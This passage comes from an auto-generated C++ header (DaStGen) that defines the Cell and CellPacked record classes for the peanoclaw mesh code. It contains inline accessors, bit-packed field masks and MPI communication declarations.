#ifdef UseManualInlining __attribute__((always_inline)) #endif { _responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); _packedRecords0 = static_cast<short int>( cellIsAForkCandidate ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ CellPacked(); /** * Generated */ CellPacked(const PersistentRecords& persistentRecords); /** * Generated */ CellPacked(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate); /** * Generated */ virtual ~CellPacked(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _persistentRecords._packedRecords0 = static_cast<short int>( isInside ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | state << (1)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | evenFlags.to_ulong() << (3)); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; return (_persistentRecords._packedRecords0& mask); } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); assertion(!evenFlags || evenFlags==1); int shift = 3 + elementIndex; int mask = 1 << (shift); int shiftedValue = evenFlags << (shift); _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 & ~mask; _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 | shiftedValue; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; _persistentRecords._packedRecords0^= mask; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); _persistentRecords._packedRecords0 = static_cast<short int>( cellIsAForkCandidate ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ Cell convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifdef PackedRecords #pragma pack (pop) #endif #elif !defined(Debug) && !defined(Parallel) && !defined(SharedMemoryParallelisation) /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::Cell { public: typedef peanoclaw::records::CellPacked Packed; enum State { Leaf = 0, Refined = 1, Root = 2 }; struct PersistentRecords { int _cellDescriptionIndex; bool _isInside; State _state; #ifdef UseManualAlignment std::bitset<DIMENSIONS> _evenFlags __attribute__((aligned(VectorisationAlignment))); #else std::bitset<DIMENSIONS> _evenFlags; #endif #ifdef UseManualAlignment tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber __attribute__((aligned(VectorisationAlignment))); #else tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; #endif /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _state = state; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _evenFlags = (evenFlags); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ Cell(); /** * Generated */ Cell(const PersistentRecords& persistentRecords); /** * Generated */ Cell(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber); /** * Generated */ virtual ~Cell(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._state = state; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._evenFlags = (evenFlags); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); return _persistentRecords._evenFlags[elementIndex]; } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags[elementIndex]= evenFlags; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags.flip(elementIndex); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ CellPacked convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifndef DaStGenPackedPadding #define DaStGenPackedPadding 1 // 32 bit version // #define DaStGenPackedPadding 2 // 64 bit version #endif #ifdef PackedRecords #pragma pack (push, DaStGenPackedPadding) #endif /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::CellPacked { public: typedef peanoclaw::records::Cell::State State; struct PersistentRecords { int _cellDescriptionIndex; tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; /** mapping of records: || Member || startbit || length | isInside | startbit 0 | #bits 1 | state | startbit 1 | #bits 2 | evenFlags | startbit 3 | #bits DIMENSIONS */ short int _packedRecords0; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _packedRecords0 = static_cast<short int>( isInside ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | state << (1)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | evenFlags.to_ulong() << (3)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ CellPacked(); /** * Generated */ CellPacked(const PersistentRecords& persistentRecords); /** * Generated */ CellPacked(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber); /** * Generated */ virtual ~CellPacked(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _persistentRecords._packedRecords0 = static_cast<short int>( isInside ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | state << (1)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** 